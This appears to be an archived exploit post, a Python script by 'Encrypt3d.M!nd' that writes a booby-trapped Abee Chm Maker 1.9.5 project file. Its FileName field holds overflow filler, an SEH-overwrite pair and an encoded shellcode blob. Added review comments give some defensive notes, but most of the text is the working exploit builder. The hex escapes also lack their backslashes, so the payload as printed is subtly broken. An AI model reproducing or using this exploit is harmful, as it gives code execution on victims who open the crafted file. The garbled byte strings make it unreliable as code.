
abeechmmaker-overflow.txt

Posted on 28 March 2009

# exploit.py
# Abee Chm Maker 1.9.5 Stack overflow Exploit
# By:Encrypt3d.M!nd
#
# After importing "Devil_inside.cmp" file into the program
# go to File>>Make CHM.. Then...watch :) .
#
# i've used SEH overwrite method to make it more stable.
# btw:it's universal so don't bother your self with finding addresses ;)
#
# NOTE(review): summary of what the code below does.
#   The script writes a Chm Maker project file (XML, 'Devil_Inside.cmp').
#   The only abnormal field is the <param name="FileName"> value, which is
#   built from filler, two short values, padding, a payload blob and more
#   filler. Every other field carries a short fixed value.
#
# NOTE(review): points for defenders.
#   - Input to distrust: .cmp project files received from outside. Per the
#     header, triggering needs a user to import the file and then run
#     File>>Make CHM, so this is a file-open (user-assisted) issue.
#   - Detection idea: a FileName value longer than a Windows path can be
#     (MAX_PATH is 260 characters), or one holding non-printable bytes, has
#     no legitimate reason to appear in a project file.
#   - Hardening: the page names no fixed version. SEH-overwrite techniques
#     are what SafeSEH (link time) and SEHOP (OS level) are meant to stop;
#     whether the 1.9.5 binaries, or the module the author's address points
#     into, opt in to either is not shown here.

# Two short values placed directly after the 320-repetition filler in the
# FileName field. The header names an SEH overwrite, so these are presumably
# the two fields of the overwritten SEH record; the listing does not label
# them.
ns = "xEBx06x90x90"
sh = "x05x67x35x45"

# Opaque payload blob. The page does not say what it executes.
shellcode = (
    "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
    "x49x49x37x49x49x49x49x49x49x49x49x49x51x5ax6ax61"
    "x58x30x41x31x50x41x42x6bx42x41x71x32x42x42x42x32"
    "x41x41x30x41x41x58x38x42x42x50x75x4dx39x69x6cx4d"
    "x38x43x74x35x50x53x30x77x70x4ex6bx53x75x77x4cx4c"
    "x4bx63x4cx54x45x34x38x67x71x5ax4fx6cx4bx62x6fx75"
    "x48x6ex6bx41x4fx47x50x33x31x58x6bx63x79x4ex6bx36"
    "x54x4cx4bx45x51x68x6ex34x71x59x50x4cx59x4cx6cx4f"
    "x74x6fx30x72x54x47x77x58x41x39x5ax34x4dx57x71x69"
    "x52x48x6bx69x64x67x4bx46x34x66x44x74x44x53x45x6b"
    "x55x4cx4bx43x6fx31x34x67x71x78x6bx63x56x4cx4bx54"
    "x4cx62x6bx6ex6bx31x4fx67x6cx37x71x78x6bx4cx4bx45"
    "x4cx4cx4bx73x31x4ax4bx6cx49x51x4cx74x64x67x74x6b"
    "x73x34x71x6fx30x42x44x6cx4bx71x50x34x70x4ex65x4f"
    "x30x62x58x46x6cx6cx4bx41x50x44x4cx4cx4bx42x50x65"
    "x4cx4ex4dx6ex6bx50x68x34x48x4ax4bx73x39x6ex6bx4b"
    "x30x4cx70x57x70x63x30x37x70x4ex6bx42x48x57x4cx51"
    "x4fx56x51x48x76x31x70x73x66x6ex69x59x68x4ex63x4f"
    "x30x73x4bx66x30x65x38x68x70x6dx5ax34x44x51x4fx30"
    "x68x4ex78x4bx4ex6cx4ax54x4ex32x77x79x6fx79x77x41"
    "x73x75x31x72x4cx41x73x57x70x61")

# First half of the project XML, ending inside the FileName value.
# That value is concatenated in this order: 320 repetitions of "x41",
# ns, sh, 20 repetitions of "x90", shellcode, 5000 repetitions of "x41".
header1 = (
    '<?xml version="1.0" encoding="Windows-1252" ?> '
    '<XMLConfig><info>Chm Maker project</info> '
    '<group name="Contents"> '
    ' <group name="0"> '
    ' <param name="Caption">filename</param> '
    ' <param name="Level">0</param> '
    ' <param name="FileName">'+"x41"*320+ns+sh+"x90"*20+shellcode+"x41" * 5000)

# Second half of the project XML: closes the FileName param and supplies the
# remaining groups with short fixed values, presumably so the file is still
# accepted as a project on import.
header2 = (
    '</param> '
    ' </group> '
    ' <param name="Count">1</param> '
    '</group> '
    '<group name="Keywords"> '
    ' <param name="Count">0</param> '
    '</group> '
    '<group name="KeywordsFinder"> '
    ' <param name="UseMeta">1</param> '
    ' <param name="UseBold">1</param> '
    ' <param name="UseItalic">0</param> '
    ' <param name="UseUnder">0</param> '
    ' <param name="UseHTag">1</param> '
    ' <param name="UseTabHeader">0</param> '
    ' <param name="MaxKeyLength">32</param> '
    ' <param name="LiveUpdate">0</param> '
    '</group> '
    '<group name="Customize"> '
    ' <param name="MainTitle">kkkkkkkkkkkkkkk</param> '
    ' <param name="DefaultPage"></param> '
    ' <param name="Left">0</param> '
    ' <param name="Top">0</param> '
    ' <param name="Width">0</param> '
    ' <param name="Heigth">0</param> '
    ' <param name="HideShow">1</param> '
    ' <param name="Back">1</param> '
    ' <param name="Forward">1</param> '
    ' <param name="Stop">0</param> '
    ' <param name="Refresh">0</param> '
    ' <param name="Options">1</param> '
    ' <param name="Print">1</param> '
    ' <param name="Font">0</param> '
    ' <param name="Locate">0</param> '
    ' <param name="Home">0</param> '
    ' <param name="HomePage"></param> '
    ' <param name="Jump1">0</param> '
    ' <param name="Jump1Page"></param> '
    ' <param name="Jump1Title"></param> '
    ' <param name="Jump2">0</param> '
    ' <param name="Jump2Page"></param> '
    ' <param name="Jump2Title"></param> '
    ' <param name="Search">1</param> '
    ' <param name="AdditionalFiles"></param> '
    '</group> '
    '</XMLConfig> '
    )

# Writes the project file into the current working directory, replacing any
# existing file of that name. The header comment spells the name
# "Devil_inside.cmp"; the name actually written is 'Devil_Inside.cmp'.
file=open('Devil_Inside.cmp','w')
file.write(header1+header2)
file.close()

 
